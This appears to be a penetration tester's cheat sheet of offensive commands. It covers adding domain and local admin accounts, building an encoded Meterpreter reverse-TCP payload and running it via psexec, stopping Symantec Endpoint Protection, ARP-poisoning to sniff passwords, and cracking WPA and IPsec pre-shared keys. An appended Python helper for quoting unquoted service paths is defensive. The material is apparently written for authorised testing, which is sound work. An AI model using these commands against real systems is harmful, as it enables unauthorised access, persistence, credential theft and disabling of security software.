# Pentesting Cheat Sheet

These are various tips and tricks I have found useful on my pentest engagements. Most of them can be found using Google, but I decided to put them in a central location to make them easily accessible. I hope they are as helpful to you as they are to me.

## Mounting Shares

To mount an SMB share using a null session, run one of the following, depending on the OS you are using.

```
Windows> net use x: \\server\share "" /u:
Linux> mount -t cifs //server/share -o username=,password= /mnt/point
```

To mount an NFS share on Linux use:

```
mount -t nfs server:/share /mnt/point
```

## Administrative Accounts

Add a new Windows domain admin account.

```
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
```

Add a new Windows local admin account.

```
net user username password /ADD
net localgroup Administrators username /ADD
```

Add a new Linux account and put it in the wheel group.

```
useradd -G wheel username && echo "username:newpass" | chpasswd
```

## Meterpreter Shell Error

If you get the error "stdapi_sys_process_execute: Operation failed: 1314" while trying to drop to a shell in Meterpreter, try the command below. This is a known bug in Meterpreter.

```
execute -f cmd.exe -c -i -H
```

## Metasploit: Custom Psexec Executable

The first thing we need to do is generate a custom executable to use with Meterpreter.

```
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
```

Next we need to set up a multi/handler to listen for connections.

```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...
```

In another msfconsole session we need to configure the psexec exploit module to use our custom executable.

```
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
```

Finally, we need to run the exploit. If everything worked, you should see a new Meterpreter session open in the multi/handler.

```
msf exploit(psexec) > exploit
```

## Disable Antivirus

This command will disable Symantec Endpoint Protection. I find it useful when I have a basic shell on a box and want to upgrade to Meterpreter but Symantec stops me.

```
c:\program files\symantec\symantec endpoint protection\smc -stop
```

## Use Ettercap to Sniff Traffic

Ettercap allows us to do ARP poisoning and sniff plaintext passwords.

```
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
```

## Cracking WPA/WPA2 PSK

Use JtR to generate candidate passwords for aircrack-ng.

```
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
```

Use Hashcat to generate candidate passwords for aircrack-ng.

```
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
```

## Cracking IPsec Aggressive Mode Pre-Shared Key

If you've never done this, read these first:

- http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
- http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html

To find aggressive mode VPNs, use ike-scan.

```
ike-scan -A 192.168.1.0/24
```

If the default transforms don't work, use the generate-transforms.sh script from the user guide above.

```
generate-transforms.sh | xargs --max-lines=8 ike-scan 10.0.0.0/24
```

If you find a SonicWALL VPN using aggressive mode, it will require a group ID; the default group ID is GroupVPN.

```
ike-scan 192.168.1.1 -A -id GroupVPN
```

Use the -P argument to save the handshake to a file, which can then be used by psk-crack.

```
ike-scan 192.168.1.1 -A -Ppsk_192.168.1.1.txt
```

Use a dictionary to crack the pre-shared key.

```
psk-crack -d /path/to/dictionary psk_192.168.1.1.txt
```

## Basic Scanning with Nmap

Discovery scans:

```
nmap -v -n -PE <target>
nmap -v -n -PE -PO -PM -PP <target>
nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP <target>
```

Detailed TCP scans:

```
nmap -v -sS -A --top-ports 10 -oA filename <target>
nmap -v -sS -A -F -oA filename <target>
nmap -v -sS -A -oA filename <target>
nmap -v -sS -A -p 1-65535 -oA filename <target>
```

Detailed UDP scans:

```
nmap -v -sU -A --top-ports 10 -oA filename <target>
nmap -v -sU -A -F -oA filename <target>
nmap -v -sU -A -oA filename <target>
nmap -v -sU -A -p 1-65535 -oA filename <target>
```

## Create an IP List with Nmap

I find this particularly useful for tools or scripts that operate on a newline-delimited list of IP addresses. I can use the simple Nmap target syntax to create a file with the list of appropriate IPs.

```
nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt
```

## Crack Passwords with John and KoreLogic Rules

At one point KoreLogic released a set of John the Ripper rules in a john.conf file. This bash one-liner grabs each ruleset name from that file and runs JtR with it.

```
for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done
```

## Unquoted Service Paths

Identify unquoted service paths that may be useful for privilege escalation.

```
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
```

https://www.commonexploits.com/unquoted-service-paths/
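The findstr chain above is a quick look; when auditing many hosts it helps to parse the wmic output and emit the fix for each finding. The following is an added example, not from the original cheat sheet: it applies the same three filters (auto start, not under C:\Windows, no quotes) to constructed wmic-style output and builds the `sc config` command that re-registers the service with a quoted path. The service names and paths are made up.

```python
import re

# Constructed wmic-style output (not captured from a real host). wmic prints
# fixed-width columns, so rows are padded to the same widths as the header.
WIDTHS = (9, 16, 50, 10)

def _row(*cols):
    return "".join(c.ljust(w) for c, w in zip(cols, WIDTHS))

SAMPLE = "\n".join([
    _row("Name", "DisplayName", "PathName", "StartMode"),
    _row("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    _row("FooSvc", "Foo Agent", r"C:\Program Files\Foo Corp\agent.exe -service", "Auto"),
    _row("BarSvc", "Bar Updater", r'"C:\Program Files\Bar\updater.exe" /quiet', "Auto"),
    _row("BazSvc", "Baz Tool", r"C:\Tools\Baz Tools\baz.exe", "Manual"),
])

EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)

def parse_wmic(text):
    """Split fixed-width wmic output into dicts using the header's column offsets."""
    lines = [l for l in text.splitlines() if l.strip()]
    header, rows = lines[0], lines[1:]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    bounds = list(zip(starts, starts[1:] + [None]))
    names = [header[s:e].strip() for s, e in bounds]
    return [dict(zip(names, [line[s:e].strip() for s, e in bounds])) for line in rows]

def executable_part(pathname):
    """Executable portion of an unquoted PathName: everything up to the first .exe."""
    m = EXE_RE.match(pathname)
    return m.group(1) if m else pathname

def is_unquoted_with_space(pathname):
    """True when the path is not quoted, contains a space, and is outside C:\\Windows."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    exe = executable_part(p)
    return " " in exe and not exe.lower().startswith("c:\\windows\\")

def find_unquoted(records):
    """Auto-start services whose binary path should be quoted (mirrors the findstr filters)."""
    return [r for r in records
            if r["StartMode"].lower() == "auto" and is_unquoted_with_space(r["PathName"])]

def fix_command(record):
    """sc config command that re-registers the service with the executable path quoted."""
    p = record["PathName"].strip()
    exe = executable_part(p)
    return f'sc config "{record["Name"]}" binPath= "\\"{exe}\\"{p[len(exe):]}"'

if __name__ == "__main__":
    for svc in find_unquoted(parse_wmic(SAMPLE)):
        print(svc["Name"], "->", fix_command(svc))
```

Only FooSvc is reported: Spooler lives under C:\Windows, BarSvc is already quoted, and BazSvc is not auto-start.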